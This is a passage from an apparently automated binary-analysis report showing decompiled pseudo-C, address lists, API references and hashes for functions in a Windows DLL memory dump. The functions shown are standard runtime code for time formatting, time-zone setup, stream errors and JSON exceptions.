											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t200 = _v33;
							if(_v33 == 0) {
								_t133 = E6E2141EF(_t165, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147, 0);
							} else {
								_t133 = E6E2143E3(_t165, _t200,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147);
							}
							_t180 = _t181;
							_t172 = _t133 - 1;
							if(_t172 <= 0) {
								L27:
								E6E1CDEE1(_t181);
								goto L28;
							} else {
								_t148 = _v32;
								_t182 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t180;
									_t180 =  &(_t180[0]);
									 *( *_t182) = _t135;
									 *_t182 =  &(( *_t182)[0]);
									 *_t148 =  *_t148 - 1;
									_t172 = _t172 - 1;
									if(_t172 > 0) {
										continue;
									}
									break;
								}
								_t181 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t183 = E6E20F26D(_t165, _t137 & _t165);
							_v28 = _t183;
							_pop(_t165);
							__eflags = _t183;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t183 = 0xdddd;
							L14:
							_t181 = _t183 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E6E1E01B0();
						_t183 = _t185;
						_v28 = _t183;
						if(_t183 == 0) {
							goto L30;
						}
						 *_t183 = 0xcccc;
						goto L14;
					}
				}
			}

0x6e207d8a
0x6e207d92
0x6e207d99
0x6e207d9f
0x6e207da2
0x6e207da9
0x6e207dac
0x6e207db2
0x6e207db5
0x6e207db9
0x6e207dbc
0x6e207dc0
0x6e207dc3
0x6e207dda
0x6e207dc5
0x6e207dc8
0x6e207dd2
0x6e207dca
0x6e207dca
0x6e207dca
0x6e207dc8
0x6e207de7
0x00000000
0x6e207ded
0x6e207df6
0x6e207dfd
0x6e207e07
0x6e207e0a
0x6e207e12
0x6e207e1a
0x6e207e22
0x6e207e29
0x6e207e2f
0x6e207e36
0x6e207e38
0x6e207e4e
0x6e207e5c
0x6e207e3a
0x6e207e47
0x6e207e47
0x6e207e61
0x6e207e65
0x00000000
0x6e207e6b
0x6e207e6b
0x6e207e6e
0x6e207e73
0x6e207e77
0x6e207ed1
0x6e207ed1
0x6e207ed3
0x6e207ed3
0x6e207ed8
0x6e207f58
0x6e207f5a
0x6e207f5f
0x6e2081d6
0x6e2081d6
0x6e2081d6
0x6e2081d9
0x6e2081dc
0x00000000
0x00000000
0x6e207f68
0x6e207f6b
0x6e207f42
0x6e207f44
0x6e207f57
0x6e207f57
0x6e207f6d
0x6e207f71
0x6e207f71
0x6e207f73
0x6e207f76
0x6e207f78
0x6e207f7b
0x6e207f7b
0x6e207f7e
0x6e207f7f
0x6e207f7f
0x6e207f84
0x6e207f87
0x6e207f8a
0x6e207f8d
0x6e207f90
0x6e2080c5
0x6e2080c5
0x6e2080c8
0x6e208195
0x6e208195
0x6e208198
0x6e2081b1
0x6e2081b5
0x6e2081b5
0x6e2081b7
0x6e2081b7
0x6e2081c7
0x6e2081cc
0x6e2081cf
0x6e2081d1
0x6e2081ec
0x00000000
0x6e2081f2
0x6e2081d3
0x6e2081d3
0x00000000
0x6e2081d3
0x6e20819a
0x6e20819a
0x6e20819d
0x00000000
0x00000000
0x6e20819f
0x6e20819f
0x6e2081a2
0x6e2081a7
0x6e2081aa
0x6e2081ad
0x00000000
0x6e2081ad
0x6e2080ce
0x6e2080ce
0x6e2080d1
0x6e208181
0x6e208181
0x6e208184
0x6e20818d
0x6e208191
0x6e208191
0x00000000
0x6e208191
0x6e208186
0x6e208186
0x6e208189
0x00000000
0x00000000
0x00000000
0x6e20818b
0x6e2080d7
0x6e2080d7
0x6e2080da
0x6e20816d
0x6e20816d
0x6e208170
0x6e208179
0x6e20817d
0x6e20817d
0x00000000
0x6e20817d
0x6e208172
0x6e208172
0x6e208175
0x00000000
0x00000000
0x00000000
0x6e208177
0x6e2080e0
0x6e2080e0
0x6e2080e3
0x6e20810c
0x6e20810f
0x6e208113
0x6e20811d
0x6e208115
0x6e208115
0x6e208115
0x6e208123
0x6e208126
0x6e208142
0x6e208142
0x6e208145
0x6e208148
0x00000000
0x00000000
0x6e20814e
0x6e208151
0x6e208151
0x6e208154
0x00000000
0x00000000
0x6e208158
0x6e20815b
0x6e20815e
0x6e208161
0x6e208163
0x6e208166
0x6e208169
0x00000000
0x00000000
0x00000000
0x6e20816b
0x6e208128
0x6e208128
0x6e20812b
0x00000000
0x00000000
0x6e20812d
0x6e208135
0x6e208138
0x6e20813b
0x6e20813b
0x00000000
0x6e208126
0x6e2080e5
0x6e2080e8
0x00000000
0x00000000
0x6e2080ef
0x6e2080ef
0x6e2080f2
0x6e208105
0x00000000
0x6e208105
0x6e2080f5
0x6e2080f5
0x6e2080f8
0x00000000
0x00000000
0x6e2080fe
0x00000000
0x6e2080fe
0x6e207f96
0x6e208094
0x6e208094
0x6e208097
0x6e2080ba
0x6e2080be
0x6e2080be
0x00000000
0x6e2080be
0x6e208099
0x6e208099
0x6e20809c
0x00000000
0x00000000
0x6e20809e
0x6e20809e
0x6e2080a1
0x6e2080b3
0x00000000
0x6e2080b3
0x6e2080a3
0x6e2080a3
0x6e2080a6
0x00000000
0x00000000
0x6e2080ac
0x00000000
0x6e2080ac
0x6e207f9c
0x6e207f9f
0x6e208041
0x6e208041
0x6e208046
0x6e20804c
0x6e20804c
0x6e20804d
0x6e208050
0x6e208056
0x6e208059
0x6e20805c
0x00000000
0x00000000
0x6e208062
0x6e208065
0x6e208065
0x6e208068
0x00000000
0x00000000
0x6e208070
0x6e208071
0x6e208074
0x6e208077
0x00000000
0x00000000
0x6e20807f
0x6e208082
0x6e208085
0x6e208087
0x6e20808a
0x6e20808d
0x00000000
0x00000000
0x00000000
0x6e20808f
0x6e208065
0x00000000
0x6e208050
0x6e207fa5
0x6e207fa8
0x6e207fbd
0x6e207fc3
0x6e207fca
0x6e207fcc
0x6e208027
0x6e20802d
0x6e20802e
0x6e208030
0x6e208035
0x6e208035
0x6e207fce
0x6e207fce
0x6e207fd1
0x6e207fd1
0x6e208038
0x00000000
0x6e208038
0x6e207faa
0x6e207fad
0x6e208007
0x6e208007
0x6e20800a
0x6e208016
0x6e20801a
0x6e20801a
0x00000000
0x6e20801a
0x6e20800c
0x6e20800c
0x6e20800f
0x00000000
0x00000000
0x00000000
0x6e208011
0x6e207faf
0x6e207fb2
0x6e207fd6
0x6e207fd6
0x6e207fd9
0x6e207ffc
0x6e208000
0x6e208000
0x00000000
0x6e208000
0x6e207fdb
0x6e207fdb
0x6e207fde
0x00000000
0x00000000
0x6e207fe0
0x6e207fe0
0x6e207fe3
0x6e207ff5
0x00000000
0x6e207ff5
0x6e207fe5
0x6e207fe5
0x6e207fe8
0x00000000
0x00000000
0x6e207fee
0x00000000
0x6e207fee
0x6e207fb4
0x6e207fb7
0x00000000
0x00000000
0x00000000
0x6e207fb7
0x00000000
0x6e2081e2
0x6e207eda
0x6e207ee1
0x6e207f0a
0x6e207ee3
0x6e207ef2
0x6e207ef2
0x6e207f11
0x6e207f13
0x6e207f16
0x6e207f3b
0x6e207f3c
0x00000000
0x6e207f18
0x6e207f18
0x6e207f1b
0x6e207f1e
0x6e207f25
0x6e207f28
0x6e207f2b
0x6e207f2e
0x6e207f31
0x6e207f33
0x6e207f36
0x00000000
0x00000000
0x00000000
0x6e207f36
0x6e207f38
0x00000000
0x6e207f38
0x6e207f16
0x6e207e7e
0x6e207e80
0x6e207e82
0x6e207e8a
0x6e207eaf
0x6e207eb1
0x6e207ebb
0x6e207ebd
0x6e207ec0
0x6e207ec1
0x6e207ec3
0x00000000
0x00000000
0x6e207ec9
0x6e207eaa
0x6e207eaa
0x00000000
0x6e207eaa
0x6e207e8e
0x6e207e92
0x6e207e97
0x6e207e99
0x6e207e9e
0x00000000
0x00000000
0x6e207ea4
0x00000000
0x6e207ea4
0x6e207e65

APIs

__freea.LIBCMT ref: 6E207F3C
__freea.LIBCMT ref: 6E207F5A

Strings

am/pm, xrefs: 6E207FBD
a/p, xrefs: 6E208021

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 25f9eed67fd3841d359398f240872d521797283c5a0dfcf87321f748db42bc88
Instruction ID: 6fd7686738a6b7622b97c0dfc978ff633e7bba2864f21a3c4520c790ff2acaa4
Opcode Fuzzy Hash: 25f9eed67fd3841d359398f240872d521797283c5a0dfcf87321f748db42bc88
Instruction Fuzzy Hash: A5D1E03591424F9FDB489FE8C8A4BABB7B3FF06301F184159E954AB2C4E3759980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1C4267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6E1E0117(0x6e2280ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6e286b60;
				_t65 = E6E201EEC(L"For");
				_t38 =  *0x6e286b60; // 0x6e22aabc
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t3 = _t38 + 4; // 0x8
				_t39 =  *_t3;
				_t4 = _t39 + 0x6e286b84; // 0x0
				_t62 =  *_t4;
				_t5 = _t39 + 0x6e286b80; // 0x0
				_t81 =  *_t5;
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6e286b60
				_push( *_t8);
				E6E1C220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6e286b60; // 0x6e22aabc
					_t13 = _t67 + 4; // 0x8
					_t14 =  *_t13 + 0x6e286b74; // 0x201
					__eflags = ( *_t14 & 0x000001c0) - 0x40;
					if(( *_t14 & 0x000001c0) == 0x40) {
						L16:
						_t18 = _t67 + 4; // 0x8
						_t44 =  *_t18;
						_t20 = _t44 + 0x6e286b98; // 0x6e286bb0
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t54 =  *0x6e286b60; // 0x6e22aabc
										_t23 = _t54 + 4; // 0x8
										_t55 =  *_t23;
										_t24 = _t55 + 0x6e286ba0; // 0x20
										_t25 = _t55 + 0x6e286b98; // 0x6e286bb0
										_t56 = E6E1C3F18( *_t25,  *_t24 & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t15 = _t67 + 4; // 0x8
								_t58 =  *_t15;
								_t16 = _t58 + 0x6e286ba0; // 0x20
								_t76 =  *_t16 & 0x0000ffff;
								_t17 = _t58 + 0x6e286b98; // 0x6e286bb0
								_t59 = E6E1C3F18( *_t17, _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6e286b60; // 0x6e22aabc
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t47 =  *0x6e286b60; // 0x6e22aabc
					_t26 = _t47 + 4; // 0x8
					_t48 =  *_t26;
					 *((intOrPtr*)(_t48 + 0x6e286b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6e286b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				_t49 =  *0x6e286b60; // 0x6e22aabc
				_t30 = _t49 + 4; // 0x8
				_t32 =  *_t30 +  *((intOrPtr*)(_t85 - 0x14)) + 0xc; // 0x0
				E6E1C3A25( *_t30 +  *((intOrPtr*)(_t85 - 0x14)),  *_t32 | _t63, 0);
				E6E1C21C1(_t63, _t85 - 0x2c, _t82,  *_t32 | _t63);
				return E6E1E0075( *((intOrPtr*)(_t85 - 0x14)));
			}

0x6e1c426e
0x6e1c4278
0x6e1c4287
0x6e1c4289
0x6e1c428e
0x6e1c4291
0x6e1c4291
0x6e1c4294
0x6e1c4294
0x6e1c429a
0x6e1c429a
0x6e1c42a0
0x6e1c42a2
0x6e1c42ba
0x6e1c42ba
0x6e1c42bd
0x6e1c42c2
0x6e1c42c5
0x6e1c42a4
0x6e1c42a4
0x6e1c42b4
0x6e1c42b4
0x6e1c42b6
0x6e1c42a6
0x6e1c42a8
0x00000000
0x6e1c42aa
0x6e1c42aa
0x6e1c42ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c42ac
0x6e1c42a8
0x6e1c42a4
0x6e1c42c8
0x6e1c42c8
0x6e1c42ce
0x6e1c42d3
0x6e1c42da
0x6e1c42e4
0x6e1c42e8
0x6e1c42ee
0x6e1c42f1
0x6e1c42fc
0x6e1c42ff
0x6e1c433c
0x6e1c433c
0x6e1c433c
0x6e1c4343
0x6e1c4350
0x6e1c4353
0x6e1c4356
0x00000000
0x6e1c4358
0x6e1c4358
0x6e1c435a
0x00000000
0x6e1c435c
0x6e1c435c
0x6e1c435c
0x6e1c435e
0x00000000
0x00000000
0x6e1c4360
0x6e1c4366
0x6e1c4366
0x6e1c436b
0x6e1c436b
0x6e1c436e
0x6e1c4375
0x6e1c437c
0x6e1c4389
0x6e1c438c
0x6e1c4393
0x6e1c4396
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c4362
0x6e1c4362
0x6e1c4364
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c4364
0x00000000
0x6e1c4360
0x6e1c439b
0x6e1c439b
0x6e1c435a
0x6e1c4301
0x6e1c4301
0x6e1c4301
0x6e1c4303
0x00000000
0x00000000
0x6e1c4305
0x6e1c430b
0x6e1c430b
0x6e1c430b
0x6e1c430e
0x6e1c430e
0x6e1c4315
0x6e1c431c
0x6e1c4329
0x6e1c432c
0x6e1c438e
0x6e1c4390
0x6e1c432e
0x6e1c432e
0x6e1c4334
0x6e1c4337
0x00000000
0x6e1c4337
0x6e1c4307
0x6e1c4307
0x6e1c4309
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c4309
0x00000000
0x6e1c4305
0x00000000
0x6e1c4301
0x6e1c439d
0x6e1c439d
0x6e1c43a2
0x6e1c43a2
0x6e1c43a5
0x6e1c43ab
0x6e1c43d6
0x6e1c42dc
0x6e1c42de
0x6e1c42de
0x6e1c43d9
0x6e1c43df
0x6e1c43e5
0x6e1c43eb
0x6e1c43f3
0x6e1c4400

APIs

__EH_prolog3_catch.LIBCMT ref: 6E1C426E
_wcslen.LIBCMT ref: 6E1C4281

Strings

For, xrefs: 6E1C4273, 6E1C4349
`k(n, xrefs: 6E1C42C8

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`k(n
API String ID: 1260878687-225852470
Opcode ID: 5a8be394db58ec97b634d30895fca89b237643fefd997957420ccc73411d57df
Instruction ID: a9d9569edda9de889819896bc4c3b717947335c37ac6d796a75c9a302cfaa021
Opcode Fuzzy Hash: 5a8be394db58ec97b634d30895fca89b237643fefd997957420ccc73411d57df
Instruction Fuzzy Hash: B541D4396282298FC700DBD8C5D099D77B2BFAAB18B214245E451FB381C738D887E752

Uniqueness

Uniqueness Score: -1.00%

Function 6E218AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E218AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_t10 =  *0x6e28506c; // 0x9881d723
				_v8 = _t10 ^ _t49;
				 *0x6e285384 =  *0x6e285384 | 0xffffffff;
				 *0x6e285378 =  *0x6e285378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6e287a10 = 0;
				_t14 = E6E211216(0x6e232130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6e232130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6E20F26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6E211216(0x6e232130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6e232130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6E20CBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6E20CBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6E218951(0x6e232130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6E21877C(0x6e232130, _t37, _t57);
					}
				}
				E6E20CBD3(_t43);
				_pop(_t44);
				return E6E1DF8A5(_v8 ^ _t47, _t35, _t44);
			}

0x6e218aac
0x6e218aaf
0x6e218ab7
0x6e218abe
0x6e218ac1
0x6e218ace
0x6e218ad5
0x6e218ad7
0x6e218add
0x6e218aec
0x6e218af3
0x6e218afd
0x6e218b07
0x6e218b0a
0x6e218b17
0x6e218b1a
0x6e218b1c
0x6e218b35
0x6e218b3d
0x6e218b3f
0x6e218b45
0x6e218b4a
0x6e218b41
0x6e218b41
0x00000000
0x6e218b41
0x6e218b1e
0x6e218b1e
0x6e218b1f
0x6e218b1f
0x6e218b1f
0x6e218b4c
0x6e218aff
0x6e218aff
0x6e218aff
0x6e218b59
0x6e218b5b
0x6e218b5f
0x6e218b6f
0x6e218b6f
0x6e218b61
0x6e218b61
0x6e218b64
0x00000000
0x6e218b66
0x6e218b66
0x6e218b67
0x6e218b6c
0x6e218b64
0x6e218b75
0x6e218b7f
0x6e218b8b

APIs

_free.LIBCMT ref: 6E218B1F
_free.LIBCMT ref: 6E218B75

Part of subcall function 6E218951: _free.LIBCMT ref: 6E2189A9
Part of subcall function 6E218951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
Part of subcall function 6E218951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
Part of subcall function 6E218951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60

Strings

0!#n, xrefs: 6E218AD8

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!#n
API String ID: 314583886-4232261716
Opcode ID: 90d01c3c20d9189d516c72b1769831f7d71be00790ccf9cd5846e2818f83f2b9
Instruction ID: 051f171e6a5d625e250e1f595eb15fb4ce7048ec10a967d2957bcc5fd7a56a74
Opcode Fuzzy Hash: 90d01c3c20d9189d516c72b1769831f7d71be00790ccf9cd5846e2818f83f2b9
Instruction Fuzzy Hash: 98216EB6C0821D5BDB2486A48CC1DDBB7FFDB52724F100695D6A6E6180EB704F84C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E6E1A1EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6E1A1CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6E1A1EBD(_t24, _t31, _t19);
						_push(0x6e283568);
						_push( &_v32);
					}
					E6E1E3D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}

0x6e1a1eea
0x6e1a1ef3
0x6e1a1ef6
0x6e1a1efd
0x6e1a1eff
0x6e1a1f47
0x6e1a1f01
0x6e1a1f05
0x6e1a1f4a
0x6e1a1f4c
0x6e1a1f07
0x6e1a1f0a
0x6e1a1f20
0x6e1a1f0c
0x6e1a1f0c
0x6e1a1f0c
0x6e1a1f29
0x6e1a1f32
0x6e1a1f35
0x6e1a1f3a
0x6e1a1f42
0x6e1a1f42
0x6e1a1f4e
0x6e1a1f53
0x6e1a1f57
0x6e1a1f57

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1A1F4E

Strings

ios_base::eofbit set, xrefs: 6E1A1F1B
ios_base::failbit set, xrefs: 6E1A1F16
ios_base::badbit set, xrefs: 6E1A1F0C, 6E1A1F31

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 398824b8ad84de54b8c9bc6e5c29bc3d1ef7961b943b7d461293996ba9082440
Instruction ID: 05eb59776bcbb382437538a95bb0e4c6f080153f8de447633dd2ba3e85aa6e90
Opcode Fuzzy Hash: 398824b8ad84de54b8c9bc6e5c29bc3d1ef7961b943b7d461293996ba9082440
Instruction Fuzzy Hash: D7F0F4F3A442182BDB40D9DCC801FEA73AD6B15314F248845EB50AB186FB65A8CECB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E1C407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6E1E00AC(0x6e22808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6E1C5192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6E201D60("[json.exception."));
				E6E1C2D14(_t30, "[json.exception.", E6E201D60("[json.exception."));
				E6E1C1F57( *((intOrPtr*)(_t33 + 8)));
				return E6E1E0075(_t30);
			}

0x6e1c4084
0x6e1c4089
0x6e1c408b
0x6e1c4090
0x6e1c4093
0x6e1c4096
0x6e1c409d
0x6e1c40a4
0x6e1c40a8
0x6e1c40c0
0x6e1c40d0
0x6e1c40d8
0x6e1c40e4

APIs

__EH_prolog3.LIBCMT ref: 6E1C4084
_strlen.LIBCMT ref: 6E1C40AF
_strlen.LIBCMT ref: 6E1C40C6

Strings

[json.exception., xrefs: 6E1C409F, 6E1C40A7, 6E1C40C5, 6E1C40CD

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: b59d5832f5c06f6bc75d13ba37398d7c3eac517e6fe90bc0df8adefa3d09002c
Instruction ID: bc0faadba2bb0e03b215610f05de76b29a248e994dc31275bee453baeeda551f
Opcode Fuzzy Hash: b59d5832f5c06f6bc75d13ba37398d7c3eac517e6fe90bc0df8adefa3d09002c
Instruction Fuzzy Hash: 70F036B16002059FD704DFB8C8406FEB6FFBF44618F540919E409D7641DFB459849791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F345, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E20F345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
